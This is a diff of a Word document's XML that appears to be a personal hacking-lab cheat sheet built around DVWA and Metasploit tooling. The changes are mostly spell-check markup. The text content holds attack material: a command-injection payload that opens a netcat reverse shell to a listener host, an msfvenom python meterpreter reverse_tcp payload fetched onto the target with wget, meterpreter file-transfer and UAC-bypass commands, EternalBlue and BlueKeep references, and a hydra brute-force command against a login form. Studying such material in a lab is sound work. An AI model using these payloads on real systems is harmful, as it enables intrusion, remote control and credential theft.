+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>eternalblue</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
         </w:tc>
@@ -3400,12 +4285,14 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>DoublePulsar</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -3426,13 +4313,36 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t>Sudo su</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Sudo dpkg –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>su</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dpkg</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3457,11 +4367,19 @@
                 <w:highlight w:val="yellow"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>BlueKeep -RDP Vulnerability</w:t>
+              <w:t>BlueKeep</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -RDP Vulnerability</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3490,12 +4408,14 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>Routersploit</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3526,8 +4446,13 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Follow the instructions in github</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Follow the instructions in </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>github</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3654,8 +4579,21 @@
                 <w:szCs w:val="20"/>
                 <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
               </w:rPr>
-              <w:t>cd routersploit</w:t>
-            </w:r>
+              <w:t xml:space="preserve">cd </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+              <w:t>routersploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3756,8 +4694,13 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use scanners/autopwn</w:t>
-            </w:r>
+              <w:t>CL: use scanners/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>autopwn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3878,8 +4821,18 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Note: msfvenom</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Note: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3913,7 +4866,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: msfvenom -h</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -h</w:t>
             </w:r>
             <w:r>
               <w:t>elp or -h</w:t>
@@ -3921,8 +4882,13 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>CL:msfvenom -p</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>CL:msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -p</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3934,12 +4900,28 @@
               <w:t>:</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> msfvenom –list venom</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: msfvenom –list payload</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –list venom</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –list payload</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3983,7 +4965,25 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Veil – generating powershell payload</w:t>
+              <w:t xml:space="preserve">Veil – generating </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>powershell</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> payload</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4074,7 +5074,15 @@
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
-              <w:t>Note: fatrat – check it out in google and follow instructions</w:t>
+              <w:t xml:space="preserve">Note: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fatrat</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – check it out in google and follow instructions</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4114,9 +5122,11 @@
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>getuid</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4185,21 +5195,36 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL meterpreter</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> &gt; </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: pwd</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: dir</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>pwd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dir</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -4235,12 +5260,28 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Some of the command in, when your in windows 10 machine</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;download {fileName}</w:t>
+              <w:t xml:space="preserve">Some of the command in, when </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>your</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> in windows 10 machine</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;download {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fileName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4248,7 +5289,15 @@
               <w:t>&gt;</w:t>
             </w:r>
             <w:r>
-              <w:t>upload {fileName}</w:t>
+              <w:t>upload {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fileName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4291,7 +5340,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>&gt;search bypassuac – user account control</w:t>
+              <w:t xml:space="preserve">&gt;search </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>bypassuac</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – user account control</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4431,8 +5488,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>&lt;dirb</w:t>
-            </w:r>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dirb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve">     ----</w:t>
             </w:r>
@@ -4445,7 +5507,15 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">&lt;dirb </w:t>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dirb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:hyperlink w:history="1">
               <w:r>
@@ -4477,7 +5547,15 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;dvwa website 192.168.1.1;ls-la</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dvwa</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> website 192.168.1.1;ls-la</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4487,7 +5565,23 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;nc -lvp 12345</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>lvp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 12345</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4497,15 +5591,20 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>192.168.1.1; nc -e /bin/bash 192.168.1.85 12345</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>192.168.1.1</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> &amp; ls -la</w:t>
+              <w:t xml:space="preserve">192.168.1.1; </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -e /bin/bash 192.168.1.85 12345</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>192.168.1.1 &amp; ls -la</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4521,7 +5620,31 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>&gt;msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -p python/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> LHOST=192.168.1.9 LPORT=6000 &gt;&gt; tester.py</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4530,13 +5653,27 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>&gt;s</w:t>
-            </w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>udo service apache2 start</w:t>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>udo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> service apache2 start</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4553,39 +5690,51 @@
               </w:rPr>
               <w:t>&gt;</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>sudo service apache2 restart</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>&gt;</w:t>
-            </w:r>
+              <w:t xml:space="preserve"> service apache2 restart</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">sudo service apache2 </w:t>
-            </w:r>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:color w:val="111111"/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>stop</w:t>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:color w:val="111111"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> service apache2 stop</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -4616,12 +5765,28 @@
           <w:p/>
           <w:p>
             <w:r>
-              <w:t>&gt;wget 192.168.1.85/tester.py</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;;wget 192.168.1.9/tester.py</w:t>
+              <w:t>&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>wget</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.1.85/tester.py</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>wget</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.1.9/tester.py</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4641,97 +5806,296 @@
           <w:tcPr>
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4675" w:type="dxa"/>
-          </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="9"/>
+              </w:numPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>Reflected XSS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t xml:space="preserve">– </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t xml:space="preserve">only work with a link with malicious </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>– Code injection</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>(usually steal session and cookies)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="9"/>
+              </w:numPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Stored XSS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>–</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>script inject</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>(just visit website) – that is stored in the server</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="9"/>
+              </w:numPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>DOM XSS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Python -m </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>SimpleHTTPServer</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{PORT}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>CSRF – Cross Site Request Forgery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">Brute Force Attack – Using </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>HYDRA</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>hydra 192.168.1.75 http-form-post "/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;Login=submit:Login failed" -L usernames.txt -P passwords.txt</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -7331,6 +8695,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1E875223"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="656431E0"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
